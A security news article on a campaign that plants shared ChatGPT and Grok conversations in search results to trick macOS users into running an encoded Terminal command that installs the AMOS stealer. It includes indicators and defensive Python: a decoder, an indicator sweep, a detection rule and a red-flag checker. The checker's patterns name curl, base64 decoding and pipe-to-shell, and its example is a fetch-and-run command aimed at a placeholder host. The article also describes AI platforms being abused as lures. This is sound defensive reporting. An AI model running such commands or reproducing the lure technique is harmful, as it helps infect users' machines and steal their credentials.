Threat actors are now exploiting the trust users place in AI platforms such as ChatGPT and Grok to distribute the Atomic macOS Stealer (AMOS).

A new campaign discovered by Huntress on December 5, 2025, shows that attackers have moved beyond impersonating trusted brands to actively using legitimate AI services to deliver malicious payloads.



The infection chain begins with a routine Google search. Users searching for common troubleshooting phrases such as “Clear disk space on macOS” are shown high-ranking results that appear to be helpful guides hosted on legitimate domains: chatgpt.com and grok.com.

AI results in search

Unlike traditional SEO poisoning, which directs victims to compromised websites, these links lead to genuine, shareable conversations on the OpenAI and xAI platforms.

Once the user clicks the link, they are presented with a professional-looking troubleshooting guide. The conversation, generated by the attacker, instructs the user to open the macOS Terminal and copy and paste a specific command to “safely clear system data.”

Weaponized conversation

Because the advice appears to come from a trusted AI assistant on a reputable domain, users often set aside their usual security skepticism.

ChatGPT and Grok Conversations Weaponized

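According to Huntress’ analysis, the executed command does not download a conventional file that would trigger macOS Gatekeeper warnings. Instead, it runs a base64-encoded script that downloads a variant of the AMOS stealer. Gatekeeper checks are applied to files carrying the com.apple.quarantine attribute, which browsers set on downloads but command-line tools such as curl do not.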
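Because the script is base64-encoded, what it actually does stays hidden until someone decodes it. The following is a minimal Python sketch for decoding such a one-liner for review without executing it. It assumes the common `echo '<blob>' | base64 -d | <shell>` shape; the regular expression and the helper name `decode_for_review` are illustrative assumptions, not taken from Huntress’ report, and the sample blob is a harmless stand-in.

```python
import base64
import binascii
import re

# Hypothetical pattern for the common "echo '<blob>' | base64 -d | <shell>" shape.
# Real lures vary, so treat a miss as "inspect by hand", not as "safe".
_ECHO_B64 = re.compile(
    r"""echo\s+['"]?([A-Za-z0-9+/=]{8,})['"]?\s*\|\s*base64\s+(?:-d|-D|--decode)"""
)


def decode_for_review(command: str) -> list[str]:
    """Decode every base64 blob piped into `base64 -d` and return the text.

    Nothing is executed; the decoded script is only returned so a human
    (or a further scanner) can read it.
    """
    decoded = []
    for blob in _ECHO_B64.findall(command):
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            decoded.append("<not valid base64>")
            continue
        # Replace undecodable bytes instead of failing on binary content.
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


# Benign stand-in for a lure: the blob decodes to "echo hello".
print(decode_for_review('echo "ZWNobyBoZWxsbw==" | base64 -d | bash'))  # ['echo hello']
```

Decoding is only the first step: the revealed script may itself fetch further stages, so the output is something to read, never something to run.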

The malware uses a “living-off-the-land” technique to harvest credentials without a graphical prompt: it calls the native dscl utility to silently validate the user’s password in the background.

Once validated, the password is piped into sudo -S to obtain root privileges, allowing the malware to install persistence mechanisms and exfiltrate data without further user interaction.

The following artifacts and behaviors have been identified as key indicators of this campaign:

| Category | Indicator / Behavior | Context |
|---|---|---|
| Persistence | /Library/LaunchDaemons/com.finder.helper.plist | LaunchDaemon created for persistence. |
| File path | /Users/$USER/.helper | Hidden executable dropped in the user’s home directory. |
| File path | /tmp/.pass | Temporary file used to store the plaintext password during escalation. |
| Command | dscl -authonly | Used to silently validate captured credentials without GUI prompts. |
| Command | sudo -S | Used to accept the password via standard input for root access. |
| Network | | Known C2 URL for the initial payload delivery (Base64-decoded). |
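The file-path indicators in the table can be checked with a short host sweep. This is a minimal sketch that only tests whether the three listed paths exist; the function names are hypothetical, the network indicator is not checked because its value is not given here, and a clean result does not prove a host is uninfected (the /tmp/.pass file, for example, is described as temporary).

```python
from pathlib import Path
from typing import Optional


def file_indicators(home: Path) -> list[Path]:
    """File-path indicators reported for this campaign."""
    return [
        Path("/Library/LaunchDaemons/com.finder.helper.plist"),  # persistence LaunchDaemon
        home / ".helper",  # hidden executable in the user's home directory
        Path("/tmp/.pass"),  # plaintext-password staging file
    ]


def sweep(home: Optional[Path] = None) -> list[Path]:
    """Return the indicator paths that exist on this host right now."""
    home = Path.home() if home is None else home
    return [p for p in file_indicators(home) if p.exists()]
```

Because the .helper path is per-user, a fleet check would call `sweep()` once for each home directory under /Users rather than only for the account running the script.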

This campaign is especially dangerous because it exploits “behavioral trust” rather than technical vulnerabilities. The attack sidesteps traditional defenses such as Gatekeeper because the user explicitly authorizes the command in the Terminal.

Security teams are advised to monitor for anomalous osascript execution and unusual dscl usage, particularly when associated with curl commands.
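As one illustration of that advice, here is a hedged sketch of a correlation rule over process telemetry. The `ProcessEvent` schema is hypothetical (map whatever your EDR exports onto it), and the rule simply flags any parent process whose direct children include curl together with osascript or `dscl ... -authonly`; it is a starting point for hunting, not a production detection.

```python
import shlex
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Hypothetical, minimal process-start record."""
    pid: int
    ppid: int
    cmdline: str


def _argv(cmdline: str) -> list[str]:
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return cmdline.split()


def _program(argv: list[str]) -> str:
    # Basename of the executable, so "/usr/bin/curl" and "curl" match alike.
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def _is_lotl_tool(argv: list[str]) -> bool:
    prog = _program(argv)
    return prog == "osascript" or (prog == "dscl" and "-authonly" in argv)


def flag_parents(events: list[ProcessEvent]) -> set[int]:
    """Return parent PIDs whose direct children include curl AND
    either osascript or `dscl ... -authonly`."""
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(_argv(ev.cmdline))
    return {
        ppid
        for ppid, argvs in children.items()
        if any(_program(a) == "curl" for a in argvs)
        and any(_is_lotl_tool(a) for a in argvs)
    }
```

Grouping by parent is a deliberately crude proxy for “spawned by the same pasted one-liner”; a real rule would also bound the time window and walk the full process tree.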

For end users, the primary defense is behavioral: legitimate AI services will not ask users to run opaque, encoded Terminal commands for routine maintenance tasks.
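That rule of thumb can be turned into a quick pre-paste check. The sketch below lists which red flags a command string raises before anyone runs it; the rule names and regular expressions are hypothetical and easy to evade with obfuscation, so an empty result does not mean a command is safe.

```python
import re

# Hypothetical red-flag rules for a command a user is about to paste.
RED_FLAGS = {
    "decodes base64": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "downloads remote content": re.compile(r"\b(?:curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"),
    "feeds a password to sudo via stdin": re.compile(r"\bsudo\s+-S\b"),
}


def red_flags(command: str) -> list[str]:
    """Return the name of every red-flag rule the command matches."""
    return [name for name, pattern in RED_FLAGS.items() if pattern.search(command)]


print(red_flags("curl -fsSL https://example.invalid/x | bash"))
# ['downloads remote content', 'pipes into a shell']
```

A routine disk-space check such as `du -sh ~/Library/Caches` raises none of these flags, which is the contrast the advice above draws.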

The shift to using trusted AI domains as hosting infrastructure creates a new challenge for defenders, who must now scrutinize traffic to these platforms for malicious patterns.
